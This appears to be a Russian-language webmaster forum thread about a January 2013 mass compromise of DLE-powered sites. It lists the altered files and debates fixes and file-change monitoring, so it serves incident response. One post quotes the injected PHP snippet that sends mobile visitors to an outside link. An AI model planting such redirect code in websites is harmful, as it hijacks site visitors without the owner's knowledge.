Массовый взлом DLE сайтов от 13.01.2013

Для тех кому еще нужно Для просмотра ссылки Войди или Зарегистрируйся решение проблемы от меня.
Дело в том, что у многих проблема существует и не все еще "полечились"
 
Для тех кому еще нужно Для просмотра ссылки Войди или Зарегистрируйся решение проблемы от меня.
Дело в том, что у многих проблема существует и не все еще "полечились"
Толку от твоего багфикса? В папке /uploads/ PHP вообще отключена... Пусть льют сколько угодно куда в аватарках - выполняться он всё равно не будет...
 
а в uploads и не нужно разрешение на выполнение.
в том то и дело, что аватарка выполняется includ'ом с другого места.
 
а в uploads и не нужно разрешение на выполнение.
в том то и дело, что аватарка выполняется includ'ом с другого места.
Для того, чтобы выполнить инклуд, сначала нужно код поправить, а смысл заливать, когда при правке кода можно что угодно сделать?
Или я не знаю тайного способа сделать инклуд произвольного скрипта в ДЛЕ?
 
Для того, чтобы выполнить инклуд, сначала нужно код поправить, а смысл заливать, когда при правке кода можно что угодно сделать?
Или я не знаю тайного способа сделать инклуд произвольного скрипта в ДЛЕ?
Не собираюсь разводить дискуссию.
Сайты взломаны и это факт.

Я написал решение для тех у кого данная проблема существует, например на сервере включен глобалс.
Мое решение позволяет оперативно убрать дыру не обращаясь к хостеру и пр. если нет возможности изменить глобалс самому т.к. некоторые хостеры это запрещают(менять настройки php.ini).
 
Проверьте у себя и предупредите других!

В настоящий момент имеется массовый взлом DLE сайтов.

изменяются файлы
файлы
index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php

вставляют код

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: Для просмотра ссылки Войди или Зарегистрируйся;);

в одном файле может быть несколько раз

про саму уязвимость ничего не известно, но возможно
Для просмотра ссылки Войди или Зарегистрируйся

Сталкивалсо с такой бойдой, до сих пор мучаюсь избавляюсь, как этот гад прописал в базу свой ява скрипт, но это было в ноябре 2012,
так же нашел еще на несколько сайтов данную проблему!
 
Это же не в базу прописывается.
 
Фигня все это. Уже пройдено. Дырень в дле и ломают через него. У меня на сервере всего два сайта пострадало, и то не мои )) итк мод не панацея, селинукс настроенный с итк поможет но опять же найдется тот знающий который обойдет это все.самый действенный способ борьбы это мониторинг изменения файлов сайта. Пускай это будут алерты но поможет вам быстро убрать и сохранить время на пивас)

P.s. Проверяйте папку с кешем и сравнивайте с оригиналом ;) чесно говорю это не я)))
 
Да тут дело не только в кеше.
У дле есть встроенный антивирус, вот его и надо задействовать по крону и в случае изменения хешей отсылать письмо админу.
 
Да тут дело не только в кеше.
У дле есть встроенный антивирус, вот его и надо задействовать по крону и в случае изменения хешей отсылать письмо админу.
При том, что папка кэш не проверяется антивирусом, есть права на запись... Именно туда выгоднее всего лить шелы... А ещё никто не мешает внести изменения в антивирус...
 
Назад
Сверху